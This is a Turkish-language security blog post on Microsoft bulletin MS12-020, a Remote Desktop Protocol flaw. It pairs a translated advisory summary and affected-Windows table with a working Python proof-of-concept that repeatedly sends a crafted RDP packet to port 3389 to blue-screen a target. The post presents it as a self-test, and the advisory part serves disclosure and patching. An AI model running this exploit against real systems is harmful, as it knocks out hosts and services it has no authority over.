|  | 

Latest Vulnerabilities

Microsoft Uzak Masaüstü Erişim Açığı MS12-020 ve Güncel Yama

Microsoft Güvenlik Bülteni MS12-020 – Kritik

Uzak Masaüstü’ndeki Güvenlik Açıkları Uzaktan Kod Yürütülmesine İzin Verebilir (2671387)

EK Açıklama : Bu açık sayesinde uzak masaüstü paylaşımı bulunan sisteme yapılan saldırı sonucunda sistem “Death of Bluescreen -“mavi ekran” hatası verip kendisini yeniden başlatacaktır.

Test Kodu :
#!/usr/bin/env python
#Author: MaYaSeVeN
#Thank BlackBap.Org, Joshua J. Drake(jduck), payload form Chinese
import socket,sys
payload="\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00\x03\x00\x01\xd6\x02\xf0\x80\x7f\x65\x82\x01\x94\x04\x01\x01\x04\x01\x01\x01\x01\xff\x30\x19\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x02\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01\x02\x02\xff\xff\x02\x04\x00\x00\x00\x02\x30\x19\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01\x02\x02\x04\x20\x02\x04\x00\x00\x00\x02\x30\x1c\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01\x02\x02\xff\xff\x02\x04\x00\x00\x00\x02\x04\x82\x01\x33\x00\x05\x00\x14\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63\x61\x81\x1c\x01\xc0\xd8\x00\x04\x00\x08\x00\x80\x02\xe0\x01\x01\xca\x03\xaa\x09\x04\x00\x00\xce\x0e\x00\x00\x48\x00\x4f\x00\x53\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xca\x01\x00\x00\x00\x00\x00\x10\x00\x07\x00\x01\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xc0\x0c\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x02\xc0\x0c\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x03\xc0\x2c\x00\x03\x00\x00\x00\x72\x64\x70\x64\x72\x00\x00\x00\x00\x00\x80\x80\x63\x6c\x69\x70\x72\x64\x72\x00\x00\x00\xa0\xc0\x72\x64\x70\x73\x6e\x64\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x0c\x02\xf0\x80\x04\x01\x00\x01\x00\x03\x00\x00\x08\x02\xf0\x80\x28\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xef\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xeb\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xec\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xed\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xee\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00"
i = 1
while(1):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(7)
s.connect((sys.argv[1],3389))
print "Sending: %d packets" % i
s.send(payload)
rec = s.recv(50)
s.close()
i += 1
except:
print "The Server is down"
exit()

Yukarıdaki kodu çalıştırdığınızda sisteminiz mavi arkan hatası veriyor ise açık sisteminizde mevcut demektir. ( Bir kaç defa yeniden kodu çalıştırmanız gerekebilir)

Yayım Tarihi: 13 Mart 2012 Salı

Sürüm: 1.0

Genel Bilgiler

Yürütmeyle İlgili Özet

Bu güvenlik güncelleştirmesi Uzak Masaüstü Protokolü’ndeki özel olarak bildirilen iki güvenlik açığını giderir. Bu güvenlik açıklarından daha önemli olanı, bir saldırgan etkilenen bir sisteme bir dizi özel hazırlanmış RDP paketi gönderirse uzaktan kod yürütülmesine izin verebilir. Varsayılan olarak, Uzak Masaüstü Protokolü (RDP) herhangi bir Windows işletim sisteminde etkin değildir. RDP’nin etkinleştirilmemiş olduğu sistemler risk altında değildir.

Bu güvenlik güncelleştirmesi Microsoft Windows’un tüm desteklenen sürümleri için Kritik olarak derecelendirilmiştir. Daha fazla bilgi için, bu bölümdeki Etkilenen ve Etkilenmeyen Yazılımlar alt bölümüne bakın.

Güvenlik güncelleştirmesi, Uzak Masaüstü Protokolü’nün bellekteki paketleri işleme ve RDP hizmetinin paketleri işleme biçimini düzelterek bu güvenlik açıklarını giderir. Bu güvenlik açıkları hakkında daha fazla bilgi için, bir sonraki bölüm olan Güvenlik Açığı Bilgileri altında, ilgili güvenlik açığı girdisinin Sık Sorulan Sorular (SSS) alt bölümüne bakın.

Öneri. Müşterilerin büyük bir bölümü otomatik güncelleştirmeleri etkinleştirmiş durumdadır ve bu güvenlik güncelleştirmesi otomatik olarak karşıdan yüklenip kurulacağı için herhangi bir işlem yapmaları gerekmemektedir. Otomatik güncelleştirmeleri etkinleştirmemiş olan müşterilerin güncelleştirmeleri el ile denetlemeleri ve bu güncelleştirmeyi yüklemeleri gerekir. Otomatik güncelleştirmelerin özel yapılandırma seçenekleri hakkında bilgi için, bkz. Microsoft Bilgi Bankası makalesi 294871.

Yöneticiler ve kurumsal yüklemeler ya da bu güvenlik güncelleştirmesini el ile yüklemek isteyen son kullanıcılar için, Microsoft, müşterilerinin güncelleştirme yönetim yazılımlarını kullanarak veya Microsoft Update hizmeti aracılığıyla güncelleştirmeleri denetleyerek güncelleştirmeyi hemen uygulamalarını önerir.

Bu bültenin sonrasında yer alan Algılama ve Dağıtım Araçları ve Kılavuzu bölümüne de bakın.

Bilinen Sorunlar. Microsoft Bilgi Bankası makalesi 2671387, bu güvenlik güncelleştirmesini yükleyen müşterilerin karşılaşabileceği bilinen sorunları belgelemektedir. Bu makale ayrıca, bu sorunlar için önerilen çözümleri de içermektedir.

Bölümün başı

Etkilenen ve Etkilenmeyen Yazılımlar

Aşağıdaki yazılımlar, hangi sürümlerinin etkilendiğini belirlemek amacıyla sınanmıştır. Diğer sürümler destek ömrünü tamamlamıştır veya bu açıktan etkilenmemektedir. Yazılımınızın sürümünün destek ömrünü belirlemek için Microsoft Destek Ömrü Web sitesini ziyaret edin.

Etkilenen Yazılımlar

İşletim Sistemi En Yüksek Güvenlik Etkisi Toplam Önem Derecesi Bu Güncelleştirmeyle Değiştirilen Bültenler
Windows XP Service Pack 3
(KB2621440)
Uzaktan Kod Yürütme Kritik MS11-065‘teki KB2570222’nin yerini KB2621440 almıştır
Windows XP Professional x64 Edition Service Pack 2
(KB2621440)
Uzaktan Kod Yürütme Kritik MS11-065‘teki KB2570222’nin yerini KB2621440 almıştır
Windows Server 2003 Service Pack 2
(KB2621440)
Uzaktan Kod Yürütme Kritik MS11-065‘teki KB2570222’nin yerini KB2621440 almıştır
Windows Server 2003 x64 Edition Service Pack 2
(KB2621440)
Uzaktan Kod Yürütme Kritik MS11-065‘teki KB2570222’nin yerini KB2621440 almıştır
Itanium Tabanlı Sistemler için Windows Server 2003 SP2
(KB2621440)
Uzaktan Kod Yürütme Kritik MS11-065‘teki KB2570222’nin yerini KB2621440 almıştır
Windows Vista Service Pack 2
(KB2621440)
Uzaktan Kod Yürütme Kritik KB2621440 yerine hiçbir bülten sunulmamaktadır
Windows Vista x64 Edition Service Pack 2
(KB2621440)
Uzaktan Kod Yürütme Kritik KB2621440 yerine hiçbir bülten sunulmamaktadır
32-bit sistemler için Windows Server 2008 Service Pack 2*
(KB2621440)
Uzaktan Kod Yürütme Kritik KB2621440 yerine hiçbir bülten sunulmamaktadır
x64 tabanlı sistemler için Windows Server 2008 Service Pack 2*
(KB2621440)
Uzaktan Kod Yürütme Kritik KB2621440 yerine hiçbir bülten sunulmamaktadır
Itanium tabanlı sistemler için Windows Server 2008 Service Pack 2
(KB2621440)
Uzaktan Kod Yürütme Kritik KB2621440 yerine hiçbir bülten sunulmamaktadır
32-bit sistemler için Windows 7 ve 32-bit sistemler için Windows 7 Service Pack 1
(KB2621440) 

32-bit sistemler için Windows 7 ve 32-bit sistemler için Windows 7 Service Pack 1
(KB2667402)

Uzaktan Kod Yürütme Kritik[1] KB2621440 yerine hiçbir bülten sunulmamaktadır

KB2667402 yerine hiçbir bülten sunulmamaktadır

x64 tabanlı sistemler için Windows 7 ve x64 tabanlı sistemler için Windows 7 Service Pack 1
(KB2621440) 

x64 tabanlı sistemler için Windows 7 ve x64 tabanlı sistemler için Windows 7 Service Pack 1
(KB2667402)

Uzaktan Kod Yürütme Kritik[1] KB2621440 yerine hiçbir bülten sunulmamaktadır

KB2667402 yerine hiçbir bülten sunulmamaktadır

x64 tabanlı sistemler için Windows Server 2008 R2 ve x64 tabanlı sistemler için Windows Server 2008 R2 Service Pack 1*
(KB2621440) 

x64 tabanlı sistemler için Windows Server 2008 R2 ve x64 tabanlı sistemler için Windows Server 2008 R2 Service Pack 1*
(KB2667402)

Uzaktan Kod Yürütme Kritik[1] KB2621440 yerine hiçbir bülten sunulmamaktadır

KB2667402 yerine hiçbir bülten sunulmamaktadır

Itanium tabanlı sistemler için Windows Server 2008 R2 ve Itanium tabanlı sistemler için Windows Server 2008 R2 Service Pack 1
(KB2621440) 

Itanium tabanlı sistemler için Windows Server 2008 R2 ve Itanium tabanlı sistemler için Windows Server 2008 R2 Service Pack 1
(KB2667402)

Uzaktan Kod Yürütme Kritik[1] KB2621440 yerine hiçbir bülten sunulmamaktadır

KB2667402 yerine hiçbir bülten sunulmamaktadır

*Sunucu Çekirdeği yüklemesi etkilenir. Bu güncelleştirme, Sunucu Çekirdeği yükleme seçeneğinin kullanılmış olup olmadığına bakılmaksızın, Windows Server 2008 veya Windows Server 2008 R2’nin desteklenen sürümlerine aynı önem derecesiyle uygulanır. Bu yükleme seçeneği hakkında daha fazla bilgi için, Sunucu Çekirdeği Yüklemesini Yönetme ve Sunucu Çekirdeği Yüklemesine Hizmet Verme adlı TechNet makalelerine bakın. Sunucu Çekirdeği yükleme seçeneği Windows Server 2008’in ve Windows Server 2008 R2’nin belirli sürümlerinde kullanılamaz; bkz. Sunucu Çekirdeği Yükleme Seçeneklerini Karşılaştırma.

[1]Güncelleştirme paketi KB2621440 ile CVE-2012-0002 ve güncelleştirme paketi KB2667402 ile CVE-2012-0152 giderilir. Microsoft Windows’un etkilenen sürümleri üzerinde CVE-2012-0152’nin önem derecesi KB2621440’tan daha düşük olmakla birlikte, CVE-2012-0002’ye dayalı olarak toplam önem derecesi Kritik olarak belirlenmiştir. Müşteriler sistemlerinde yüklü olan Microsoft Windows sürümü için sunulan tüm güncelleştirmeleri uygulamalıdır.

microsoft-uzak-masaustu-erisim-acigi-ms12-020-ve-guncel-yama

ABOUT THE AUTHOR

Application Security , Information and Software Security Specialist Ethical Hacker and Pentester

POST YOUR COMMENTS